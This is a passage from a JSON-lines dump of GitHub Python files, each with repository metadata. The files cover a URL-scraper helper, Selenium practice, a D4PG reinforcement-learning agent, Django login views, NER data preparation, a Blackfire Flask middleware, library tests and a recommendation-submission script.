yes_no_check\nfrom Classes.Project import Project\n\ndef new_project():\n \n name = input('Creating new project, enter project name: ')\n \n root = 'https://noc.com.sg/foodking/'\n print(f'Current rooturl: {root}')\n \n if yes_no_check('Change rooturl?'):\n root = get_valid_root()\n print(f'Rooturl changes to {root}')\n \n project = Project(name, root)\n project.add_prescraped(root)\n \n return project\n\ndef get_valid_root():\n \n import re\n valid = re.compile(\"\\w+\\.\\w+\")\n \n valid_root = False\n while not valid_root:\n root = input('Enter new rooturl: ')\n if valid.search(root):\n root = format_url(root)\n valid_root = True\n else:\n print(f'{root} is an invalid rooturl')\n \n return root\n\ndef format_url(url):\n \n if not url.startswith('http'):\n url = 'http://' + url\n if not url.endswith('/'):\n url = url + '/'\n \n return url","repo_name":"isaacngcs/Data-Scraping","sub_path":"Functions/new_project.py","file_name":"new_project.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36492638610","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 7 13:20:12 2022\n\n@author: Januario Cipriano\n\"\"\"\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom 
selenium.webdriver.common.by import By\n\ndriver = webdriver.Chrome(\"C:\\\\Users\\\\a248433\\\\Documents\\\\drivers\\\\chromedriver.exe\")\ndriver.get('http://www.python.org')\nassert \"Python\" in driver.title\n\nelem = driver.find_element(By.NAME, 'q')\nelem.clear()\nelem.send_keys('pycon')\nelem.send_keys(Keys.RETURN)\nassert \"No results found.\" not in driver.page_source\ndriver.close()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Januario95/RealPython","sub_path":"selenium_practice_2.py","file_name":"selenium_practice_2.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"31886895983","text":"\"\"\"\nAuthor: David Valencia\nDate: 12/ 04 /2022\nCompleted :\n\nDescription:\n            Distributed Distributional Deterministic Policy Gradients (D4PG)\n\n            A D4PG algorithm attempts to improve the accuracy of a\n            DDPG algorithm by incorporating a distributional approach and N-step return\n\n            Need:\n            Python 3\n            Pytorch\n            Gym Env --> Pendulum-v1\n\n            Important points:\n            - Continuous action space only\n            - Action Space --> representing the torque, number of actions: one\n            - Observation Space --> representing the x-y coordinates of the pendulum's end and its angular velocity\n            - Reward --> *r = -(theta^2 + 0.1 * theta_dt^2 + 0.001 * torque^2)*\n            - The episode automatically terminates at 200 time steps.\n\n            - D4PG uses simple random noise from a normal distribution to encourage action exploration instead of OU noise\n            - D4PG can use K agents running in parallel (however, here I use only 1 agent)\n            - The actor and critic NNs are updated very differently w.r.t. DDPG; here the updates are distribution-to-distribution\n\n\"\"\"\n\nimport sys\nimport gym\nimport random\nimport numpy as np\nfrom collections import deque\nimport matplotlib.pyplot as plt\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\n\nclass Critic(nn.Module):\n    def __init__(self, input_size, hidden_size, num_atoms):\n        super(Critic, self).__init__()\n\n        self.h_linear_1 = nn.Linear(in_features=input_size, out_features=256)\n        self.h_linear_2 = nn.Linear(in_features=256, out_features=128)\n        self.h_linear_3 = nn.Linear(in_features=128, out_features=num_atoms)\n\n    def forward(self, state, action):\n        x = torch.cat([state, action], dim=1)  # Concatenates the seq tensors in the given dimension\n        x = torch.relu(self.h_linear_1(x))\n        x = torch.relu(self.h_linear_2(x))\n        x = self.h_linear_3(x)  # No activation function here\n        x = F.softmax(x, dim=1)  # softmax because critic should output probabilities\n        return x\n\n\nclass Actor(nn.Module):\n    def __init__(self, input_size, hidden_size, output_size):\n        super(Actor, self).__init__()\n\n        self.h_linear_1 = nn.Linear(input_size, 256)\n        self.h_linear_2 = nn.Linear(256, 128)\n        self.h_linear_3 = nn.Linear(128, output_size)\n\n    def forward(self, state):\n        x = torch.relu(self.h_linear_1(state))\n        x = torch.relu(self.h_linear_2(x))\n        x = torch.tanh(self.h_linear_3(x))\n        return x\n\n\nclass NoiseGenerator:\n    def __init__(self, action_dims, action_bound_high, noise_scale=0.3):\n\n        self.action_dims = action_dims\n        self.action_bounds = action_bound_high\n        self.noise_scale = noise_scale\n\n    def noise_gen(self):\n        noise = np.random.normal(size=self.action_dims) * self.action_bounds * self.noise_scale\n        return noise\n\n\nclass Memory:\n    def __init__(self, replay_max_size):\n        self.replay_max_size = replay_max_size\n        self.replay_buffer = 
deque(maxlen=replay_max_size) # batch of experiences to sample during training\n\n def replay_buffer_add(self, state, action, reward, next_state, done):\n #experience = (state, action, np.array([reward]), next_state, done)\n experience = (state, action, reward, next_state, done)\n self.replay_buffer.append(experience)\n\n def sample_experience(self, batch_size):\n state_batch = []\n action_batch = []\n reward_batch = []\n next_state_batch = []\n done_batch = []\n\n batch = random.sample(self.replay_buffer, batch_size)\n\n for experience in batch:\n state, action, reward, next_state, done = experience\n state_batch.append(state)\n action_batch.append(action)\n reward_batch.append(reward)\n next_state_batch.append(next_state)\n done_batch.append(done)\n\n return state_batch, action_batch, reward_batch, next_state_batch, done_batch\n\n def __len__(self):\n return len(self.replay_buffer)\n\n\nclass PerMemory(object):\n # stored as ( state, action, reward, next_state ) in SumTree\n PER_e = 0.01\n PER_a = 0.6\n PER_b = 0.4\n\n PER_b_increment_per_sampling = 0.001\n absolute_error_upper = 1. # clipped abs error\n\n def __init__(self, capacity):\n # Making the tree\n self.tree = SumTree(capacity)\n\n def per_add(self, state, action, reward, next_state, done):\n #experience = state, action, np.array([reward]), next_state, done\n experience = state, action, (reward), next_state, done\n self.store(experience)\n\n def store(self, experience):\n # Find the max priority\n max_priority = np.max(self.tree.tree[-self.tree.capacity:])\n\n # If the max priority = 0 we can't put priority = 0 since this experience\n # will never have a chance to be selected, so we use a minimum priority\n if max_priority == 0:\n max_priority = self.absolute_error_upper\n\n self.tree.add(max_priority, experience) # set the max priority for new priority\n\n def sample_experience(self, n):\n # Create a minibatch array that will contain the minibatch of experiences\n minibatch = []\n b_idx = np.empty((n,), dtype=np.int32)\n # Calculate the priority segment\n # Here, as explained in the paper, we divide the Range[0, ptotal] into n ranges\n priority_segment = self.tree.total_priority / n # priority segment\n\n for i in range(n):\n # A value is uniformly sample from each range\n a, b = priority_segment * i, priority_segment * (i + 1)\n value = np.random.uniform(a, b)\n # Experience that correspond to each value is retrieved\n index, priority, data = self.tree.get_leaf(value)\n b_idx[i] = index\n minibatch.append([data[0], data[1], data[2], data[3], data[4]])\n\n return b_idx, minibatch\n\n def batch_update(self, tree_idx, abs_errors):\n abs_errors += self.PER_e # convert to abs and avoid 0\n clipped_errors = np.minimum(abs_errors, self.absolute_error_upper)\n ps = np.power(clipped_errors, self.PER_a)\n\n for ti, p in zip(tree_idx, ps):\n self.tree.update(ti, p)\n\n\nclass SumTree(object):\n data_pointer = 0\n\n # Here we initialize the tree with all nodes = 0, and initialize the data with all values = 0\n def __init__(self, capacity):\n # Number of leaf nodes (final nodes) that contains experiences\n self.capacity = capacity\n\n # Generate the tree with all nodes values = 0\n # To understand this calculation (2 * capacity - 1)\n # Remember we are in a binary node (each node has max 2 children) so 2x size of leaf (capacity) - 1 (root node)\n # Parent nodes = capacity - 1\n # Leaf nodes = capacity\n self.tree = np.zeros(2 * capacity - 1)\n # Contains the experiences (so the size of data is capacity)\n self.data = np.zeros(capacity, 
dtype=object)\n\n def add(self, priority, data):\n # Look at what index we want to put the experience, fill the leaves from left to right\n tree_index = self.data_pointer + self.capacity - 1\n # Update data frame\n self.data[self.data_pointer] = data\n # Update the leaf\n self.update(tree_index, priority)\n # Add 1 to data_pointer\n self.data_pointer += 1\n if self.data_pointer >= self.capacity: # If we're above the capacity, we go back to first index (we overwrite)\n self.data_pointer = 0\n\n def update(self, tree_index, priority):\n # Change = new priority score - former priority score\n change = priority - self.tree[tree_index]\n self.tree[tree_index] = priority\n\n # then propagate the change through tree\n # this method is faster than the recursive loop\n while tree_index != 0:\n tree_index = (tree_index - 1) // 2\n self.tree[tree_index] += change\n\n def get_leaf(self, v):\n parent_index = 0\n while True:\n left_child_index = 2 * parent_index + 1\n right_child_index = left_child_index + 1\n\n # If we reach bottom, end the search\n if left_child_index >= len(self.tree):\n leaf_index = parent_index\n break\n else: # downward search, always search for a higher priority node\n if v <= self.tree[left_child_index]:\n parent_index = left_child_index\n else:\n v -= self.tree[left_child_index]\n parent_index = right_child_index\n\n data_index = leaf_index - self.capacity + 1\n return leaf_index, self.tree[leaf_index], self.data[data_index]\n\n @property\n def total_priority(self):\n return self.tree[0] # Returns the root node\n\n\nclass D4PGAgent:\n\n def __init__(self, env, actor_learning_rate=1e-4, critic_learning_rate=1e-4, gamma=0.99,\n max_memory_size=50000, tau=1e-3, n_steps=1):\n\n # -------- Parameters --------------- #\n self.num_states = env.observation_space.shape[0] # 3\n self.num_actions = env.action_space.shape[0] # 1\n\n self.act_max_bound = env.action_space.high # [2.]\n self.act_min_bound = env.action_space.low # [-2.]\n\n # these parameters are used for the probability distribution\n self.n_atoms = 51\n self.v_min = -10\n self.v_max = 10\n self.delta = (self.v_max - self.v_min) / (self.n_atoms - 1)\n self.v_lin = torch.linspace(self.v_min, self.v_max, self.n_atoms).view(-1, 1)\n\n self.gamma = gamma # discount factor\n self.tau = tau\n self.n_steps = n_steps\n self.t_step = 0 # counter for activating learning every few steps\n\n # ---------- Initialization and build the networks ----------- #\n hidden_size = 256 # todo try different size for each hidden layer\n self.actor = Actor(self.num_states, hidden_size, self.num_actions) # main Actor network Actor\n self.critic = Critic(self.num_states + self.num_actions, hidden_size, self.n_atoms) # main Critic network\n\n self.actor_target = Actor(self.num_states, hidden_size, self.num_actions)\n self.critic_target = Critic(self.num_states + self.num_actions, hidden_size, self.n_atoms)\n\n # Initialization of the target networks as copies of the original networks\n for target_param, param in zip(self.actor_target.parameters(), self.actor.parameters()):\n target_param.data.copy_(param.data)\n\n for target_param, param in zip(self.critic_target.parameters(), self.critic.parameters()):\n target_param.data.copy_(param.data)\n\n # optimizers\n # todo check with different lr values\n self.actor_optimizer = optim.Adam(self.actor.parameters(), lr=actor_learning_rate)\n self.critic_optimizer = optim.Adam(self.critic.parameters(), lr=critic_learning_rate)\n\n # ----------- Gaussian Noise Generator -------------- #\n self.noise = 
NoiseGenerator(self.num_actions, self.act_max_bound)\n\n # ------------- Initialization memory --------------------- #\n self.memory = Memory(max_memory_size)\n\n per_max_memory_size = 10000\n self.memory_per = PerMemory(per_max_memory_size)\n\n def get_action(self, state):\n state_tensor = torch.from_numpy(state).float().unsqueeze(0) # numpy to a tensor with shape [1,3]\n\n self.actor.eval()\n with torch.no_grad():\n action = self.actor(state_tensor)\n action = action.detach()\n action = action.numpy()\n noise = np.random.normal(size=action.shape)\n action = np.clip(action + noise, -1, 1) # todo maybe I could change this to -2, 2?\n self.actor.train()\n return action[0]\n\n def distr_projection(self, next_distribution, rewards, dones):\n next_distr = next_distribution.data.cpu().numpy()\n rewards = rewards.data.cpu().numpy()\n dones_mask = dones.cpu().numpy().astype(bool)\n batch_size = len(rewards)\n proj_distr = np.zeros((batch_size, self.n_atoms), dtype=np.float32)\n gamma = self.gamma ** self.n_steps\n\n for atom in range(self.n_atoms):\n tz_j = np.minimum(self.v_max, np.maximum(self.v_min, rewards + (self.v_min + atom * self.delta) * gamma))\n b_j = (tz_j - self.v_min) / self.delta\n l = np.floor(b_j).astype(np.int64)\n u = np.ceil(b_j).astype(np.int64)\n eq_mask = u == l\n proj_distr[eq_mask, l[eq_mask]] += next_distr[eq_mask, atom]\n ne_mask = u != l\n proj_distr[ne_mask, l[ne_mask]] += next_distr[ne_mask, atom] * (u - b_j)[ne_mask]\n proj_distr[ne_mask, u[ne_mask]] += next_distr[ne_mask, atom] * (b_j - l)[ne_mask]\n\n if dones_mask.any():\n proj_distr[dones_mask] = 0.0\n tz_j = np.minimum(self.v_max, np.maximum(self.v_min, rewards[dones_mask]))\n b_j = (tz_j - self.v_min) / self.delta\n l = np.floor(b_j).astype(np.int64)\n u = np.ceil(b_j).astype(np.int64)\n eq_mask = u == l\n eq_dones = dones_mask.copy()\n eq_dones[dones_mask] = eq_mask\n if eq_dones.any():\n proj_distr[eq_dones, l[eq_mask]] = 1.0\n ne_mask = u != l\n ne_dones = dones_mask.copy()\n ne_dones[dones_mask] = ne_mask\n if ne_dones.any():\n proj_distr[ne_dones, l[ne_mask]] = (u - b_j)[ne_mask]\n proj_distr[ne_dones, u[ne_mask]] = (b_j - l)[ne_mask]\n\n return torch.FloatTensor(proj_distr)\n\n def step_training(self, state, action, reward, next_state, done, batch_size, per_memory_status):\n\n # Save experience in memory\n if per_memory_status:\n self.memory_per.per_add(state, action, reward, next_state, done)\n else:\n self.memory.replay_buffer_add(state, action, reward, next_state, done)\n\n LEARN_EVERY_STEP = 100\n self.t_step = self.t_step + 1\n\n if self.t_step % LEARN_EVERY_STEP == 0:\n self.learn_step(batch_size, per_memory_status)\n\n def learn_step(self, batch_size, per_memory_status):\n if per_memory_status:\n tree_idx, minibatch = self.memory_per.sample_experience(batch_size)\n states = np.zeros((batch_size, self.num_states))\n next_states = np.zeros((batch_size, self.num_states))\n actions, rewards, dones = [], [], []\n for i in range(batch_size):\n states[i] = minibatch[i][0]\n actions.append(minibatch[i][1])\n rewards.append(minibatch[i][2])\n next_states[i] = minibatch[i][3]\n dones.append(minibatch[i][4])\n else:\n # check, if enough samples are available in memory\n if self.memory.__len__() <= batch_size:\n return\n else:\n states, actions, rewards, next_states, dones = self.memory.sample_experience(batch_size)\n\n states = np.array(states)\n actions = np.array(actions)\n rewards = np.array(rewards)\n dones = np.array(dones)\n next_states = np.array(next_states)\n\n states = torch.FloatTensor(states)\n 
actions = torch.FloatTensor(actions)\n rewards = torch.FloatTensor(rewards)\n dones = torch.ByteTensor(dones)\n next_states = torch.FloatTensor(next_states)\n\n '''\n # this is from tutorial only\n # remeber here remove the softmax in the last critic's layer\n # ---------------------------- update critic ---------------------------- #\n crt_distr_v = self.critic.forward(states, actions)\n\n last_act_v = self.actor_target.forward(next_states)\n last_distr_v = F.softmax(self.critic_target.forward(next_states, last_act_v), dim=1)\n\n proj_distr_v = self.distr_projection(last_distr_v, rewards, dones)\n prob_dist_v = -F.log_softmax(crt_distr_v, dim=1) * proj_distr_v\n critic_loss_v = prob_dist_v.sum(dim=1).mean()\n\n self.critic_optimizer.zero_grad()\n critic_loss_v.backward()\n self.critic_optimizer.step()\n\n # ---------------------------- update actor ---------------------------- #\n actions_pred = self.actor.forward(states)\n crt_distr_v = self.critic.forward(states, actions_pred)\n\n support_v = torch.arange(self.v_min, self.v_max + self.delta, self.delta)\n weights = F.softmax(crt_distr_v, dim=1) * support_v\n actor_loss_v = weights.sum(dim=1)\n actor_loss_v = - actor_loss_v.unsqueeze(dim=-1) # todo check this line\n actor_loss_v = actor_loss_v.mean()\n\n self.actor_optimizer.zero_grad()\n actor_loss_v.backward()\n self.actor_optimizer.step()\n\n\n # update the target networks using tao \"soft updates\"\n for target_param, param in zip(self.actor_target.parameters(), self.actor.parameters()):\n target_param.data.copy_(param.data * self.tau + target_param.data * (1.0 - self.tau))\n\n for target_param, param in zip(self.critic_target.parameters(), self.critic.parameters()):\n target_param.data.copy_(param.data * self.tau + target_param.data * (1.0 - self.tau))\n '''\n # -------------------------------------------------------------------#\n # -------------------------------------------------------------------#\n\n # calculate the next Z distribution Z(s',a') --> Q_next_value\n next_actions = self.actor_target.forward(next_states) # Note this is from actor-target\n next_Z_val = self.critic_target.forward(next_states, next_actions.detach())\n\n # calculate the project target distribution Y --> Q_target\n proj_distr_v = self.distr_projection(next_Z_val, rewards, dones)\n Y = proj_distr_v # target_z_projected\n\n # calculate the distribution prediction Z(s,a) --> Q_values\n Z_val = self.critic.forward(states, actions) # this is a categorical distribution, the Z predicted\n # ----------------------------------- Calculate the loss ----- #\n # ------- calculate the critic loss\n BCE_loss = torch.nn.BCELoss(reduction='none')\n td_error = BCE_loss(Z_val, Y)\n td_error = td_error.mean(axis=1)\n critic_loss = td_error.mean()\n\n # ------- calculate the actor loss\n z_atoms = np.linspace(self.v_min, self.v_max, self.n_atoms)\n z_atoms = torch.from_numpy(z_atoms).float()\n actor_loss = self.critic.forward(states, self.actor.forward(states))\n actor_loss = actor_loss * z_atoms\n actor_loss = torch.sum(actor_loss, dim=1)\n actor_loss = -actor_loss.mean()\n\n # ---------Update priorities for PER\n if per_memory_status:\n td_error = td_error.detach().numpy().flatten()\n absolute_errors = np.abs(td_error)\n self.memory_per.batch_update(tree_idx, absolute_errors)\n\n # ------------------------------------- Update networks ----- #\n # Actor step Update\n self.actor_optimizer.zero_grad()\n actor_loss.backward()\n self.actor_optimizer.step()\n\n # Critic step Update\n self.critic_optimizer.zero_grad()\n 
critic_loss.backward()\n        self.critic_optimizer.step()\n\n        # update the target networks using tau \"soft updates\"\n        for target_param, param in zip(self.actor_target.parameters(), self.actor.parameters()):\n            target_param.data.copy_(param.data * self.tau + target_param.data * (1.0 - self.tau))\n\n        for target_param, param in zip(self.critic_target.parameters(), self.critic.parameters()):\n            target_param.data.copy_(param.data * self.tau + target_param.data * (1.0 - self.tau))\n    \n\n\ndef main():\n\n    EPISODES = 50000  # ---> T, total number of episodes\n    batch_size = 64  # ---> M\n    rollout_steps = 1  # ---> N, trajectory length\n    gamma = 0.99\n    # -------------------------------\n    env = gym.make('Pendulum-v1')\n    agent = D4PGAgent(env, gamma=gamma, n_steps=rollout_steps)\n    # -------------------------------\n    per_memory_status = False\n    # -----------\n    rewards = []\n    avg_rewards = []\n    for episode in range(1, EPISODES + 1):\n        state = env.reset()\n        done = False\n        episode_reward = 0\n\n        while not done:\n            env.render()\n            n_step_reward = 0\n            for n in range(rollout_steps):\n                action = agent.get_action(state)\n                next_state, reward, done, _ = env.step(action)\n                n_step_reward += reward * gamma ** n  # todo should use gamma here?\n                if n == (rollout_steps - 1):\n                    agent.step_training(state, action, n_step_reward, next_state, done, batch_size, per_memory_status)\n                state = next_state\n                episode_reward += reward\n\n            if done:\n                print(episode_reward, episode)\n                break\n        rewards.append(episode_reward)\n        avg_rewards.append(np.mean(rewards[-10:]))\n\n    plt.plot(rewards)\n    plt.plot(avg_rewards)\n    plt.plot()\n    plt.xlabel('Episode')\n    plt.ylabel('Reward')\n    plt.show()\n\n\nif __name__ == '__main__':\n    main()\n\n","repo_name":"dvalenciar/robotic_arm_environment","sub_path":"RL_algorithms_basic/D4PG.py","file_name":"D4PG.py","file_ext":"py","file_size_in_byte":21453,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"7"}
{"seq_id":"464503048","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.contrib.auth import authenticate, login\nfrom ..forms import LoginForm\nfrom django.contrib.auth.decorators import login_required\nfrom ..forms import UserRegistrationForm\n\n# TIPS\ndef user_login(request):\n    # Request submitted via POST\n    if request.method == 'POST':\n        form = LoginForm(request.POST)\n        if form.is_valid():\n            cd = form.cleaned_data\n            user = authenticate(\n                request=request, \n                username=cd['username'], \n                password=cd['password']\n            )\n            # Success \n            if user is not None:\n                if user.is_active:\n                    login(request=request, user=user)\n                    return HttpResponse('You have logged in successfully')\n                \n                # Not found\n                else:\n                    return HttpResponse('Account not found')\n            # invalid credentials\n            else:\n                return HttpResponse('incorrect username or password ')\n    \n    # Request as GET\n    else:\n        form = LoginForm()\n    \n    context = {\n        'form':form\n    }\n\n    return render(request=request, template_name='account/login.html', context=context)\n\n@login_required\ndef dashboard(request):\n    context = {\n        'section': 'dashboard'\n    }\n    return render(\n        request=request,\n        template_name='account/dashboard.html', \n        context=context\n    )\n\ndef register(request):\n    if request.method == 'POST':\n        user_form = UserRegistrationForm(request.POST)\n        if user_form.is_valid():\n            # Create a new user object, but do not save it yet\n            new_user = user_form.save(commit=False)\n            # Set the chosen password\n            new_user.set_password(\n                user_form.cleaned_data['password2']\n            )\n            # Save the object\n            
new_user.save()\n\n context = {\n 'new_user':new_user\n }\n\n return render(\n request=request,\n template_name='account/register_done.html',\n context=context\n )\n\n else:\n user_form = UserRegistrationForm()\n\n\n context = {\n 'user_form':user_form\n }\n\n return render(\n request=request,\n template_name='account/register.html',\n context=context\n )","repo_name":"ArturSeytjanov/social_app","sub_path":"account/views/fb_views.py","file_name":"fb_views.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"31090933144","text":"import re\nimport random\nimport os\n\nimport numpy as np\nimport pandas as pd\n\ndef seed_everything(seed):\n os.environ['PYTHONHASHSEED'] = str(seed)\n np.random.seed(seed)\n np.random.default_rng(seed)\n random.seed(seed)\n\ndef generate_data(data):\n gen_data = []\n answer = []\n\n pattern = r'<.*?:.*?>'\n for row in data:\n items = re.findall(pattern, row)\n\n new_row = row\n for item in items:\n new_row = new_row.replace(item, item.split(\":\")[0].lstrip(\"<\"))\n \n gen_data.append(\"ner: \" + new_row)\n answer.append(\"\".join(items))\n\n return gen_data, answer\n\n\nif __name__ == \"__main__\":\n seed_everything(981029)\n\n with open(\"./data/klue_ner_train_80.t\", \"r\") as f:\n train_data = f.read().splitlines()\n\n with open(\"./data/klue_ner_test_20.t\", \"r\") as f:\n test_data = f.read().splitlines()\n\n df = pd.DataFrame(columns=[\"source\", \"target\"])\n df['source'], df['target'] = generate_data(train_data)\n\n df = df.sample(frac=1).reset_index(drop=True)\n\n split_point = int(len(df) * 0.8)\n\n train_df = df[:split_point]\n val_df = df[split_point:]\n \n test_df = pd.DataFrame(columns=[\"source\", \"target\"])\n test_df['source'], test_df['target'] = generate_data(test_data)\n\n train_df.to_csv(\"train.csv\", index=False)\n val_df.to_csv(\"validation.csv\", index=False)\n test_df.to_csv(\"test.csv\", index=False)\n","repo_name":"kkjsw17/KU-NLP-kt-dev-challenge-2022","sub_path":"data/gen_data.py","file_name":"gen_data.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35442989999","text":"from blackfire.utils import get_logger\nfrom blackfire.hooks.wsgi import BlackfireWSGIMiddleware\nfrom blackfire.hooks.utils import add_probe_response_header\n\nlog = get_logger(__name__)\n\n\nclass BlackfireFlaskMiddleware(BlackfireWSGIMiddleware):\n\n FRAMEWORK = 'flask'\n\n def __init__(self, flask_app):\n self.app = flask_app.wsgi_app\n self.flask_app = flask_app\n\n def build_blackfire_yml_response(\n self, blackfireyml_content, agent_response, environ, start_response,\n *args\n ):\n from flask import Response\n\n response = Response()\n if agent_response: # send response if signature is validated\n response.data = blackfireyml_content or ''\n add_probe_response_header(response.headers, agent_response)\n\n return response(environ, start_response)\n\n def get_view_name(self, environ):\n \"\"\"This is a best effort to get the viewname at the start of Wsgi.__call__\n \n In fact, while running in Flask context, it is easy to get this value \n from the Request object via `request.endpoint` but wsgi.__call__ is not \n running in request context.\n \n The only place we run in request context in a standard WSGI middleware is\n the `start_response` callback. 
But if we check endpoint there and start \n the profiler there, then we might end up losing some code paths: especially\n the middlewares that ran before ours. As a general rule of thumb: we would \n like to start the profiler as early as possible and end as late as possible.\n \"\"\"\n\n def _get_view_name(method, url):\n from werkzeug.routing import RequestRedirect\n from werkzeug.exceptions import MethodNotAllowed, NotFound\n\n adapter = self.flask_app.url_map.bind('dummy')\n try:\n match = adapter.match(url, method=method)\n except RequestRedirect as e:\n # recursively match redirects\n return _get_view_name(e.new_url, method)\n except (MethodNotAllowed, NotFound):\n return None\n\n try:\n r = self.flask_app.view_functions[match[0]]\n return r.__name__\n except KeyError:\n # no view is associated with the endpoint\n return None\n\n try:\n return _get_view_name(\n environ['REQUEST_METHOD'], environ.get('PATH_INFO', '')\n )\n except Exception as e:\n log.exception(e)\n","repo_name":"blackfireio/python-sdk","sub_path":"hooks/flask/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"7"} +{"seq_id":"72692805022","text":"import os\nos.environ['TDML_FRAMEWORK'] = 'pytorch'\nimport tdml\nimport unittest\nimport torch\n\nclass TestDataPyTorch(unittest.TestCase):\n\n\tdef test_data(self):\n\t\tarray = torch.tensor([[1,2,3,4], [5,6,7,8]])\n\t\tdata = tdml.Data(array)\n\n\t\tself.assertEqual(data.shape, (2, 4))\n\t\tself.assertEqual(data.num_sample, 2)\n\t\tself.assertEqual(str(data), \"Data(data=[2, 4])\")\n\n\t\treshuffle_indices = torch.tensor([1, 0])\n\t\treshuffle_array = torch.tensor([[5,6,7,8], [1,2,3,4]])\n\t\tdata.reshuffle(reshuffle_indices)\n\t\tself.assertTrue(torch.all(torch.eq(data.data, reshuffle_array)))\n\n\tdef test_feature(self):\n\t\tarray = torch.tensor([[1,2,3,4], [5,6,7,8]])\n\t\tfeature = tdml.Feature(array)\n\n\t\tself.assertEqual(feature.num_feature, 4)\n\n\tdef test_label(self):\n\t\tarray = torch.tensor([0,0,1,2,1,3,2,1,1,1,1,0])\n\t\tlabel = tdml.Label(array)\n\n\t\tself.assertEqual(label.num_label, 4)\n\nif __name__ == '__main__':\n\tunittest.main()","repo_name":"zechengz/tdml","sub_path":"tests/test_data/test_data_pytorch.py","file_name":"test_data_pytorch.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"30054521790","text":"from common import *\nfrom context_fm import CONTEXT_FM\nfrom W_B_manager import W_B_MANAGER\nfrom data_loader import DATA_LOADER\nfrom parser import load_pickle\nimport csv\nimport os\nimport tensorflow as tf\nimport numpy as np\n\nclass SUBMISSION:\n def __init__(self, file_path, is_val=False):\n self.csv = open(file_path, 'w')\n header = submission_header\n if is_val : \n header.insert(2, 'pick')\n header.insert(3, 'click')\n self.writer = csv.DictWriter(self.csv, fieldnames = header)\n\n self.writer.writeheader()\n \n def write(self, user_id, session_id, timestamp, step, item_reccomendations_list) :\n self.writer.writerow({'user_id' : user_id, 'session_id' : session_id, 'timestamp' : timestamp, 'step' : step, 'item_recommendations' : item_reccomendations_list})\n\n def write_is_val(self, user_id, session_id, timestamp, step, item_reccomendations_list, click, pick) :\n self.writer.writerow({'user_id' : user_id, 'session_id' : session_id, 'timestamp' : timestamp, 'step' : step, 'click' : click, 'item_recommendations' 
: item_reccomendations_list, 'pick' : pick})\n\n def close(self) :\n self.csv.close()\n\nif __name__ == \"__main__\" :\n W_user_id_path = '/hdd/sap/ml/final/data/WB/W_user_id_norm_pd_7810000.npy'\n B_user_id_path = '/hdd/sap/ml/final/data/WB/B_user_id_norm_pd_7810000.npy'\n W_item_id_path = '/hdd/sap/ml/final/data/WB/W_item_id_norm_pd_7810000.npy'\n B_item_id_path = '/hdd/sap/ml/final/data/WB/B_item_id_norm_pd_7810000.npy'\n #checkpoint_path=tf.train.latest_checkpoint(model_path)\n checkpoint_path=\"/hdd/sap/ml/final/model_norm_pd-7810000\"\n \n '''\n W_user_id_path = '/hdd/sap/ml/final/data/WB/W_user_id_norm_pd_400000.npy'\n B_user_id_path = '/hdd/sap/ml/final/data/WB/B_user_id_norm_pd_400000.npy'\n W_item_id_path = '/hdd/sap/ml/final/data/WB/W_item_id_norm_pd_400000.npy'\n B_item_id_path = '/hdd/sap/ml/final/data/WB/B_item_id_norm_pd_400000.npy'\n checkpoint_path=\"/hdd/sap/ml/final/model_norm_pd-400000\"\n '''\n \n os.environ[\"CUDA_VISIBLE_DEVICES\"]='0'\n w_dim =10 \n lr = 1\n batch_size = 1\n loss_type = 'TOP1'\n \n session_id_list = load_pickle(session_id_list_path)\n user_id_list = load_pickle(user_id_list_path)\n\n w_b_manager = W_B_MANAGER(W_user_id_path, B_user_id_path, W_item_id_path, B_item_id_path)\n W_B = w_b_manager.load()\n test_loader = DATA_LOADER(test_enc_path, enc_test_name, test_dic_path, item_property_binary_enc_path, batch_size, W_B, is_train=False)\n test_loader = DATA_LOADER(impression_enc_path, impression_enc_val_name, impression_dic_val_path, item_property_binary_enc_path, batch_size, W_B, is_train=False)\n sumission_csv_path = '/home/sapark/class/ml/final/submission/val_sub7.csv' \n #sumission_csv_path = '/home/sapark/class/ml/final/submission/sub7.csv' \n #submission = SUBMISSION(sumission_csv_path)\n submission = SUBMISSION(sumission_csv_path, is_val = True)\n fm = CONTEXT_FM(w_dim, lr, loss_type, item_size = 25)\n with tf.Session() as session:\n saver = tf.train.Saver()\n saver.restore(session, checkpoint_path) \n for i in range(test_loader.impression_dic_size) :\n filter_idx, platform_idx, device_idx, W_user_id, B_user_id, price, dp_order, interaction, W_item_id, B_item_id, item_property_binary, _, _, _, _, impressions = test_loader.get_batch()\n price_mean = np.mean(price)\n price_std = max(np.std(price), 1)\n price = - ( (price - price_mean) / price_std )\n interaction = interaction > 0\n item_property_binary = item_property_binary / np.clip(np.sum(item_property_binary), 1, 10000)\n filter_idx = filter_idx / np.clip(np.sum(filter_idx), 1, 10000)\n\n impressions = impressions.split('|')\n feed_dict_test = {fm.filter_idx : filter_idx, \\\n fm.platform_idx : platform_idx,\\\n fm.device_idx : device_idx,\\\n fm.interaction : interaction,\\\n fm.price : price,\\\n fm.order : dp_order,\\\n fm.W_user_id_ph : W_user_id,\\\n fm.W_item_id_ph : W_item_id,\\\n fm.B_user_id_ph : B_user_id,\\\n fm.B_item_id_ph : B_item_id,\\\n fm.item_property_binary : item_property_binary,\\\n fm.impression : impressions\\\n }\n\n cur_recip_rank = session.run(fm.prediction, feed_dict=feed_dict_test)\n 